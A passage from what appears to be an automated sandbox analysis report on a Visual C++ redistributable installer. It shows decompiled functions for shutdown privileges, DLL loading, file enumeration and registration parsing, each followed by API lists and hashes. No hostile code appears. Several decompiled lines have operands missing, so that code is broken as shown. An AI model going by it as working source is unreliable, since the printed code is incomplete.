						_t48 =  >=  ? 0x80004005 :  <=  ? _t34 : _t34 & 0x0000ffff | 0x80070000;
						E000B37D3(0x80004005, "engine.cpp", 0x35d, _t48);
						_push("Failed to get shutdown privilege LUID.");
						goto L13;
					}
				} else {
					_t37 = GetLastError();
					_t59 =  <=  ? _t37 : _t37 & 0x0000ffff | 0x80070000;
					_t48 =  >=  ? 0x80004005 :  <=  ? _t37 : _t37 & 0x0000ffff | 0x80070000;
					E000B37D3(0x80004005, "engine.cpp", 0x356, _t48);
					_push("Failed to get process token.");
					L13:
					_push(_t48);
					E000F012F();
				}
				if(_v28 != 0) {
					CloseHandle(_v28);
				}
				return E000DDE36(0, _v8 ^ _t60, _t45, _t47, _t48);
			}























                                                                          0x000b44e9
                                                                          0x000b44ef
                                                                          0x000b44f6
                                                                          0x000b4501
                                                                          0x000b4504
                                                                          0x000b4507
                                                                          0x000b4508
                                                                          0x000b4509
                                                                          0x000b4510
                                                                          0x000b4521
                                                                          0x000b455e
                                                                          0x000b456c
                                                                          0x000b4573
                                                                          0x000b457b
                                                                          0x000b45c1
                                                                          0x000b45c9
                                                                          0x000b4600
                                                                          0x000b4605
                                                                          0x000b4607
                                                                          0x000b4618
                                                                          0x000b4620
                                                                          0x000b4633
                                                                          0x000b4633
                                                                          0x000b4636
                                                                          0x000b4638
                                                                          0x000b4639
                                                                          0x000b4650
                                                                          0x000b465d
                                                                          0x000b4662
                                                                          0x00000000
                                                                          0x000b4662
                                                                          0x000b45cb
                                                                          0x000b45cb
                                                                          0x000b45dc
                                                                          0x000b45e6
                                                                          0x000b45f4
                                                                          0x000b45f9
                                                                          0x00000000
                                                                          0x000b45f9
                                                                          0x000b457d
                                                                          0x000b457d
                                                                          0x000b458e
                                                                          0x000b4598
                                                                          0x000b45a6
                                                                          0x000b45ab
                                                                          0x00000000
                                                                          0x000b45ab
                                                                          0x000b4523
                                                                          0x000b4523
                                                                          0x000b4534
                                                                          0x000b453e
                                                                          0x000b454c
                                                                          0x000b4551
                                                                          0x000b4667
                                                                          0x000b4667
                                                                          0x000b4668
                                                                          0x000b466e
                                                                          0x000b4672
                                                                          0x000b4677
                                                                          0x000b4677
                                                                          0x000b468f

                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000020,?,00000001,00000000,?,?,?,?,?,?,?), ref: 000B4512
                                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 000B4519
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 000B4523
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 000B4573
                                                                          • GetLastError.KERNEL32 ref: 000B457D
                                                                          • CloseHandle.KERNEL32(?), ref: 000B4677
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastProcess$CloseCurrentHandleLookupOpenPrivilegeTokenValue
                                                                          • String ID: @Met$Failed to adjust token to add shutdown privileges.$Failed to get process token.$Failed to get shutdown privilege LUID.$Failed to schedule restart.$SeShutdownPrivilege$user.cpp
                                                                          • API String ID: 4232854991-3888403951
                                                                          • Opcode ID: d765f38ae7c8ec5cd050d5fa42079a91881ba864bbd720486545f1235f99f35e
                                                                          • Instruction ID: e8b13eabc9c0dab0f2e8eae1a1d2eaea636e47a3344da415c716fc3c554e7583
                                                                          • Opcode Fuzzy Hash: d765f38ae7c8ec5cd050d5fa42079a91881ba864bbd720486545f1235f99f35e
                                                                          • Instruction Fuzzy Hash: DE41D472A40328ABF7206AB9DD4AFFB76D8EF04741F110125BF01F6591DA648E009AA6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000B1070 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 77fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E000B1070(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				WCHAR* _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t24;
				void* _t29;
				void* _t33;
				void* _t35;
				void* _t40;
				intOrPtr _t41;
				void* _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t47;
				signed int _t48;
				void* _t49;
				signed int _t50;

				_t45 = __edx;
				_t42 = __ecx;
				_t24 =  *0x11a008; // 0xf77c1860
				_v8 = _t24 ^ _t50;
				_t41 = _a4;
				_t46 = _a12;
				_t49 = _t48 | 0xffffffff;
				_v52 = 0;
				_v48 = 0;
				_v44 = L"cabinet.dll";
				_v40 = L"msi.dll";
				_v36 = L"version.dll";
				_v32 = L"wininet.dll";
				_v28 = L"comres.dll";
				_v24 = L"clbcatq.dll";
				_v20 = L"msasn1.dll";
				_v16 = L"crypt32.dll";
				_v12 = L"feclient.dll";
				if(E000B33D7( &_v48, 0) >= 0) {
					_t40 = CreateFileW(_v48, 0x80000000, 5, 0, 3, 0x80, 0); // executed
					_t49 = _t40;
				}
				_t29 = E000B501B(_t46); // executed
				_t52 = _t29;
				if(_t29 == 0) {
					E000B1174(_t42,  &_v44, 9);
				} else {
					E000B11FB();
				}
				_t33 = E000B508D(_t42, _t45, _t52, _t41, _t49, _t46, _a16,  &_v52); // executed
				_t47 = _t33;
				if(_t49 != 0xffffffff) {
					CloseHandle(_t49);
				}
				if(_v48 != 0) {
					E000F54EF(_v48);
				}
				_t35 =  <  ? _t47 : _v52;
				return E000DDE36(_t41, _v8 ^ _t50, _t45, _t47, _t49);
			}
































                                                                          0x000b1070
                                                                          0x000b1070
                                                                          0x000b1076
                                                                          0x000b107d
                                                                          0x000b1081
                                                                          0x000b1088
                                                                          0x000b108b
                                                                          0x000b108f
                                                                          0x000b1092
                                                                          0x000b1099
                                                                          0x000b10a0
                                                                          0x000b10a7
                                                                          0x000b10ae
                                                                          0x000b10b5
                                                                          0x000b10bc
                                                                          0x000b10c3
                                                                          0x000b10ca
                                                                          0x000b10d1
                                                                          0x000b10df
                                                                          0x000b10f6
                                                                          0x000b10fc
                                                                          0x000b10fc
                                                                          0x000b10ff
                                                                          0x000b1104
                                                                          0x000b1106
                                                                          0x000b1115
                                                                          0x000b1108
                                                                          0x000b1108
                                                                          0x000b1108
                                                                          0x000b1124
                                                                          0x000b1129
                                                                          0x000b112e
                                                                          0x000b1131
                                                                          0x000b1131
                                                                          0x000b113b
                                                                          0x000b1140
                                                                          0x000b1140
                                                                          0x000b114d
                                                                          0x000b115d

                                                                          APIs
                                                                            • Part of subcall function 000B33D7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,00000000,00000000,?,000DAD27,00000001,00000000,?,WixBundleSourceProcessPath,00000001,?), ref: 000B33F8
                                                                          • CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 000B10F6
                                                                            • Part of subcall function 000B1174: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,000B111A,cabinet.dll,00000009,?,?,00000000), ref: 000B1185
                                                                            • Part of subcall function 000B1174: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,000B111A,cabinet.dll,00000009,?,?,00000000), ref: 000B1190
                                                                            • Part of subcall function 000B1174: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 000B119E
                                                                            • Part of subcall function 000B1174: GetLastError.KERNEL32(?,?,?,?,000B111A,cabinet.dll,00000009,?,?,00000000), ref: 000B11B9
                                                                            • Part of subcall function 000B1174: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 000B11C1
                                                                            • Part of subcall function 000B1174: GetLastError.KERNEL32(?,?,?,?,000B111A,cabinet.dll,00000009,?,?,00000000), ref: 000B11D6
                                                                          • CloseHandle.KERNEL32(?,?,?,?,000FB4C0,?,cabinet.dll,00000009,?,?,00000000), ref: 000B1131
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
                                                                          • String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
                                                                          • API String ID: 3687706282-3151496603
                                                                          • Opcode ID: 2501c6169be942ef1ae92b9cf8f159e9d509981891ed686fb5db9de30c43c6cb
                                                                          • Instruction ID: 1d33145a667dd6dcd49bdc7fb9c619b6f45e2b51cf3007674be299340e55b958
                                                                          • Opcode Fuzzy Hash: 2501c6169be942ef1ae92b9cf8f159e9d509981891ed686fb5db9de30c43c6cb
                                                                          • Instruction Fuzzy Hash: C221717190020CABDB10AFA9DD45BFEBBB8EF09714F504519FA20B7292DB749904DFA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000C993E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108filestringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 95%
                                                                          			E000C993E(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				short _v38;
				struct _WIN32_FIND_DATAW _v600;
				char _v604;
				char _v608;
				WCHAR* _v612;
				void* __ebp;
				signed int _t39;
				void* _t45;
				void* _t55;
				int _t57;
				signed int _t60;
				void* _t63;
				signed int _t65;
				void* _t68;
				void* _t69;
				void* _t72;
				void* _t74;
				void* _t75;
				signed int _t76;

				_t74 = __esi;
				_t73 = __edi;
				_t72 = __edx;
				_t69 = __ecx;
				_t68 = __ebx;
				_t39 =  *0x11a008; // 0xf77c1860
				_v8 = _t39 ^ _t76;
				_v604 = 0;
				_v612 = 0;
				_v608 = 0;
				E000DF670(__edi,  &_v600, 0, 0x250);
				_t45 = E000CA189(_t69, _a4, L".unverified",  &_v604); // executed
				if(_t45 >= 0) {
					E000B3BC3(_t72, _v604, 7); // executed
				}
				if(_a4 != 0 || E000C80AE(_t72, _a8,  &_v604) < 0 || E000B2D79(_t69, _v604, L"*.*",  &_v612) < 0) {
					L16:
					if(_v608 != 0) {
						E000F54EF(_v608);
					}
					if(_v612 != 0) {
						E000F54EF(_v612);
					}
					if(_v604 != 0) {
						E000F54EF(_v604);
					}
					return E000DDE36(_t68, _v8 ^ _t76, _t72, _t73, _t74);
				} else {
					_push(_t74);
					_t55 = FindFirstFileW(_v612,  &_v600); // executed
					_t75 = _t55;
					if(_t75 == 0xffffffff) {
						L15:
						_pop(_t74);
						goto L16;
					} else {
						goto L6;
					}
					do {
						L6:
						if((_v600.dwFileAttributes & 0x00000010) != 0) {
							goto L13;
						}
						_v38 = 0;
						_t60 = lstrlenW( &(_v600.cFileName));
						if(_t60 <= 2) {
							L11:
							_t63 = E000B2D79(_t69, _v604,  &(_v600.cFileName),  &_v608);
							_t89 = _t63;
							if(_t63 >= 0) {
								E000F4038(_t69, _t89, _v608);
							}
							goto L13;
						}
						_t69 = 0x2e;
						if(_t69 !=  *((intOrPtr*)(_t76 + _t60 * 2 - 0x22c))) {
							goto L11;
						}
						_t65 =  *(_t76 + _t60 * 2 - 0x22a) & 0x0000ffff;
						_t69 = 0x52;
						if(_t69 == _t65) {
							goto L13;
						}
						_t69 = 0x72;
						if(_t69 == _t65) {
							goto L13;
						}
						goto L11;
						L13:
						_t57 = FindNextFileW(_t75,  &_v600); // executed
					} while (_t57 != 0);
					FindClose(_t75);
					goto L15;
				}
			}























                                                                          0x000c993e
                                                                          0x000c993e
                                                                          0x000c993e
                                                                          0x000c993e
                                                                          0x000c993e
                                                                          0x000c9947
                                                                          0x000c994e
                                                                          0x000c9959
                                                                          0x000c995f
                                                                          0x000c9965
                                                                          0x000c9972
                                                                          0x000c9989
                                                                          0x000c9990
                                                                          0x000c999a
                                                                          0x000c999a
                                                                          0x000c99a3
                                                                          0x000c9a86
                                                                          0x000c9a8d
                                                                          0x000c9a95
                                                                          0x000c9a95
                                                                          0x000c9aa1
                                                                          0x000c9aa9
                                                                          0x000c9aa9
                                                                          0x000c9ab5
                                                                          0x000c9abd
                                                                          0x000c9abd
                                                                          0x000c9acf
                                                                          0x000c99df
                                                                          0x000c99df
                                                                          0x000c99ed
                                                                          0x000c99f3
                                                                          0x000c99f8
                                                                          0x000c9a85
                                                                          0x000c9a85
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000c99fe
                                                                          0x000c99fe
                                                                          0x000c9a05
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000c9a09
                                                                          0x000c9a14
                                                                          0x000c9a1d
                                                                          0x000c9a44
                                                                          0x000c9a58
                                                                          0x000c9a5d
                                                                          0x000c9a5f
                                                                          0x000c9a67
                                                                          0x000c9a67
                                                                          0x00000000
                                                                          0x000c9a5f
                                                                          0x000c9a21
                                                                          0x000c9a2a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000c9a2c
                                                                          0x000c9a36
                                                                          0x000c9a3a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000c9a3e
                                                                          0x000c9a42
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000c9a6c
                                                                          0x000c9a74
                                                                          0x000c9a7a
                                                                          0x000c9a7f
                                                                          0x00000000
                                                                          0x000c9a7f

                                                                          APIs
                                                                          • FindFirstFileW.KERNELBASE(?,?,?,?,*.*,?,?,?,00000000,.unverified,?), ref: 000C99ED
                                                                          • lstrlenW.KERNEL32(?), ref: 000C9A14
                                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 000C9A74
                                                                          • FindClose.KERNEL32(00000000), ref: 000C9A7F
                                                                            • Part of subcall function 000B3BC3: GetFileAttributesW.KERNELBASE(?,?,?,?,00000000,?,?), ref: 000B3C3F
                                                                            • Part of subcall function 000B3BC3: GetLastError.KERNEL32(?,?,?,00000000,?,?), ref: 000B3C52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$AttributesCloseErrorFirstLastNextlstrlen
                                                                          • String ID: *.*$.unverified
                                                                          • API String ID: 457978746-2528915496
                                                                          • Opcode ID: 7ee33b4174eea7c24f8bff0639dd6e0c83518a9d9cc06101ab6cbccc95634933
                                                                          • Instruction ID: d4a8676515c13c3549da00eb400aeea4ff6dd9a8e419992e66bc89fcf7fb8978
                                                                          • Opcode Fuzzy Hash: 7ee33b4174eea7c24f8bff0639dd6e0c83518a9d9cc06101ab6cbccc95634933
                                                                          • Instruction Fuzzy Hash: B341913190062CAEDB60AB60DC0DFEE77B8AF44305F5001A9E908E10A1EB758EC4DF55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000E4812 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E000E4812(int _a4) {
				void* _t14;
				void* _t15;
				void* _t17;
				void* _t18;
				void* _t19;

				if(E000E8A73(_t14, _t15, _t17, _t18, _t19) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E000E4897(_t15, _a4);
				ExitProcess(_a4);
			}








                                                                          0x000e481e
                                                                          0x000e483a
                                                                          0x000e483a
                                                                          0x000e4843
                                                                          0x000e484c

                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000000,?,000E47E8,00000000,00117CF8,0000000C,000E493F,00000000,00000002,00000000), ref: 000E4833
                                                                          • TerminateProcess.KERNEL32(00000000,?,000E47E8,00000000,00117CF8,0000000C,000E493F,00000000,00000002,00000000), ref: 000E483A
                                                                          • ExitProcess.KERNEL32 ref: 000E484C
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CurrentExitTerminate
                                                                          • String ID:
                                                                          • API String ID: 1703294689-0
                                                                          • Opcode ID: d5dafb76e87928069972e38aa495fa0c6d18c286d15c489112d4be81377bb688
                                                                          • Instruction ID: bf903da6175051d1a840ed4995baf4111f70ada85d5f9d7431d966a9df097fee
                                                                          • Opcode Fuzzy Hash: d5dafb76e87928069972e38aa495fa0c6d18c286d15c489112d4be81377bb688
                                                                          • Instruction Fuzzy Hash: 26E04631000288AFDF416F12DE09AAE3F69FB40341F040024F818AB532CF39EC42EB80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000F4315 Relevance: 3.0, APIs: 2, Instructions: 44fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E000F4315(WCHAR* _a4, signed char* _a8) {
				signed int _v8;
				struct _WIN32_FIND_DATAW _v600;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t10;
				void* _t15;
				signed char _t19;
				signed char* _t20;
				void* _t23;
				void* _t24;
				signed int _t27;

				_t10 =  *0x11a008; // 0xf77c1860
				_v8 = _t10 ^ _t27;
				_t20 = _a8;
				_t26 = _a4;
				_t24 = 0;
				E000DF670(0,  &_v600, 0, 0x250);
				_t15 = FindFirstFileW(_a4,  &_v600); // executed
				if(_t15 != 0xffffffff) {
					FindClose(_t15);
					_t19 = _v600.dwFileAttributes;
					if((_t19 & 0x00000010) == 0) {
						if(_t20 != 0) {
							 *_t20 = _t19;
						}
						_t24 = 1;
					}
				}
				return E000DDE36(_t20, _v8 ^ _t27, _t23, _t24, _t26);
			}
















                                                                          0x000f431e
                                                                          0x000f4325
                                                                          0x000f4329
                                                                          0x000f4333
                                                                          0x000f433c
                                                                          0x000f4340
                                                                          0x000f4350
                                                                          0x000f4359
                                                                          0x000f435c
                                                                          0x000f4362
                                                                          0x000f436a
                                                                          0x000f436e
                                                                          0x000f4370
                                                                          0x000f4370
                                                                          0x000f4374
                                                                          0x000f4374
                                                                          0x000f436a
                                                                          0x000f4387

                                                                          APIs
                                                                          • FindFirstFileW.KERNELBASE(?,?,00000000,00000000,?), ref: 000F4350
                                                                          • FindClose.KERNEL32(00000000), ref: 000F435C
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileFirst
                                                                          • String ID:
                                                                          • API String ID: 2295610775-0
                                                                          • Opcode ID: 6c91e7099e8a2c6c3ad8650c4a2d956b1b699d95cc3373aa80a585514361f73c
                                                                          • Instruction ID: 2549b3657b1d7cf4cdab75ca407e5835e884679eb17a647ab8985fa9f5a38cf5
                                                                          • Opcode Fuzzy Hash: 6c91e7099e8a2c6c3ad8650c4a2d956b1b699d95cc3373aa80a585514361f73c
                                                                          • Instruction Fuzzy Hash: 0B01867160020CABDB20EF69DD899BBB7ACEBC5315F400166F958D7641D7349E498B60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000DE773 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E000DE773() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E000DE77F); // executed
				return _t1;
			}




                                                                          0x000de778
                                                                          0x000de77e

                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNELBASE(Function_0002E77F,000DDEF8), ref: 000DE778
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: 91961c8120eddbfad48e5d8cba0f6eebf39225c92b7e81d283dbaa2cb8509e65
                                                                          • Instruction ID: 0df5e58b0b9a50af0c5a0baf86660c7b8447db40adc81d4e4ea01233a5546f50
                                                                          • Opcode Fuzzy Hash: 91961c8120eddbfad48e5d8cba0f6eebf39225c92b7e81d283dbaa2cb8509e65
                                                                          • Instruction Fuzzy Hash:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000BF86E Relevance: 112.4, APIs: 3, Strings: 61, Instructions: 445COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 bf86e-bf8a4 call f388a 3 bf8b8-bf8d1 call f31c7 0->3 4 bf8a6-bf8b3 call f012f 0->4 10 bf8dd-bf8f2 call f31c7 3->10 11 bf8d3-bf8d8 3->11 9 bfda0-bfda5 4->9 12 bfdad-bfdb2 9->12 13 bfda7-bfda9 9->13 22 bf8fe-bf90b call be936 10->22 23 bf8f4-bf8f9 10->23 14 bfd97-bfd9e call f012f 11->14 16 bfdba-bfdbf 12->16 17 bfdb4-bfdb6 12->17 13->12 28 bfd9f 14->28 20 bfdc1-bfdc3 16->20 21 bfdc7-bfdcb 16->21 17->16 20->21 25 bfdcd-bfdd0 call f54ef 21->25 26 bfdd5-bfddc 21->26 31 bf90d-bf912 22->31 32 bf917-bf92c call f31c7 22->32 23->14 25->26 28->9 31->14 35 bf938-bf94a call f4b5a 32->35 36 bf92e-bf933 32->36 39 bf959-bf96e call f31c7 35->39 40 bf94c-bf954 35->40 36->14 45 bf97a-bf98f call f31c7 39->45 46 bf970-bf975 39->46 41 bfc23-bfc2c call f012f 40->41 41->28 50 bf99b-bf9ad call f33db 45->50 51 bf991-bf996 45->51 46->14 54 bf9b9-bf9cf call f388a 50->54 55 bf9af-bf9b4 50->55 51->14 58 bfc7e-bfc98 call bebb2 54->58 59 bf9d5-bf9d7 54->59 55->14 66 bfc9a-bfc9f 58->66 67 bfca4-bfcbc call f388a 58->67 60 bf9d9-bf9de 59->60 61 bf9e3-bf9f8 call f33db 59->61 60->14 68 bf9fa-bf9ff 61->68 69 bfa04-bfa19 call f31c7 61->69 66->14 73 bfcc2-bfcc4 67->73 74 bfd86-bfd87 call befe5 67->74 68->14 76 bfa1b-bfa1d 69->76 77 bfa29-bfa3e call f31c7 69->77 78 bfcd0-bfcee call f31c7 73->78 79 bfcc6-bfccb 73->79 84 bfd8c-bfd90 74->84 76->77 81 bfa1f-bfa24 76->81 88 bfa4e-bfa63 call f31c7 77->88 89 bfa40-bfa42 77->89 90 bfcfa-bfd12 call f31c7 78->90 91 bfcf0-bfcf5 78->91 79->14 81->14 84->28 87 bfd92 84->87 87->14 99 bfa73-bfa88 call f31c7 88->99 100 bfa65-bfa67 88->100 89->88 92 bfa44-bfa49 89->92 97 bfd1f-bfd37 call f31c7 90->97 98 bfd14-bfd16 90->98 91->14 92->14 107 bfd39-bfd3b 97->107 108 bfd44-bfd5c call f31c7 97->108 98->97 101 bfd18-bfd1d 98->101 109 bfa8a-bfa8c 99->109 110 bfa98-bfaad call f31c7 99->110 100->99 102 bfa69-bfa6e 100->102 101->14 102->14 107->108 114 bfd3d-bfd42 107->114 117 bfd5e-bfd63 108->117 118 bfd65-bfd7d call f31c7 108->118 109->110 111 bfa8e-bfa93 109->111 119 bfaaf-bfab1 110->119 120 bfabd-bfad2 call f31c7 110->120 111->14 114->14 117->14 118->74 126 bfd7f-bfd84 118->126 119->120 122 bfab3-bfab8 119->122 127 bfae2-bfaf7 call f31c7 120->127 128 bfad4-bfad6 120->128 122->14 126->14 132 bfaf9-bfafb 127->132 133 bfb07-bfb1c call f31c7 127->133 128->127 129 bfad8-bfadd 128->129 129->14 132->133 135 bfafd-bfb02 132->135 137 bfb1e-bfb20 133->137 138 bfb2c-bfb44 call f31c7 133->138 135->14 137->138 139 bfb22-bfb27 137->139 142 bfb46-bfb48 138->142 143 bfb54-bfb6c call f31c7 138->143 139->14 142->143 144 bfb4a-bfb4f 142->144 147 bfb6e-bfb70 143->147 148 bfb7c-bfb91 call f31c7 143->148 144->14 147->148 150 bfb72-bfb77 147->150 152 bfc31-bfc33 148->152 153 bfb97-bfbb4 CompareStringW 148->153 150->14 154 bfc3e-bfc40 152->154 155 bfc35-bfc3c 152->155 156 bfbbe-bfbd3 CompareStringW 153->156 157 bfbb6-bfbbc 153->157 158 bfc4c-bfc64 call f33db 154->158 159 bfc42-bfc47 154->159 155->154 161 bfbe1-bfbf6 CompareStringW 156->161 162 bfbd5-bfbdf 156->162 160 bfbff-bfc04 157->160 158->58 168 bfc66-bfc68 158->168 159->14 160->154 164 bfbf8 161->164 165 bfc06-bfc1e call b37d3 161->165 162->160 164->160 165->41 170 bfc6a-bfc6f 168->170 171 bfc74 168->171 170->14 171->58
                                                                          C-Code - Quality: 67%
                                                                          			E000BF86E(void* __edx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				void* _v12;
				short* _v16;
				void* _v20;
				void* _t88;
				void* _t112;
				int _t158;
				void* _t164;
				signed int _t166;
				intOrPtr* _t167;
				intOrPtr* _t168;
				intOrPtr* _t169;
				void* _t174;
				intOrPtr _t176;
				void* _t179;
				void* _t188;
				void* _t190;

				_t174 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				_t88 = E000F388A(_a8, L"Registration",  &_v12);
				_t164 = 0x80070490;
				_t179 =  ==  ? 0x80070490 : _t88;
				if(_t179 >= 0) {
					_push(__edi);
					_t176 = _a4;
					_t8 = _t176 + 0x10; // 0xb534d
					if(E000F31C7(_v12, L"Id", _t8) >= 0) {
						_t10 = _t176 + 0x14; // 0xb5351
						if(E000F31C7(_v12, L"Tag", _t10) >= 0) {
							if(E000BE936(_t176, _t176, _a8) >= 0) {
								if(E000F31C7(_v12, L"Version",  &_v16) >= 0) {
									_t15 = _t176 + 0x38; // 0xb5375
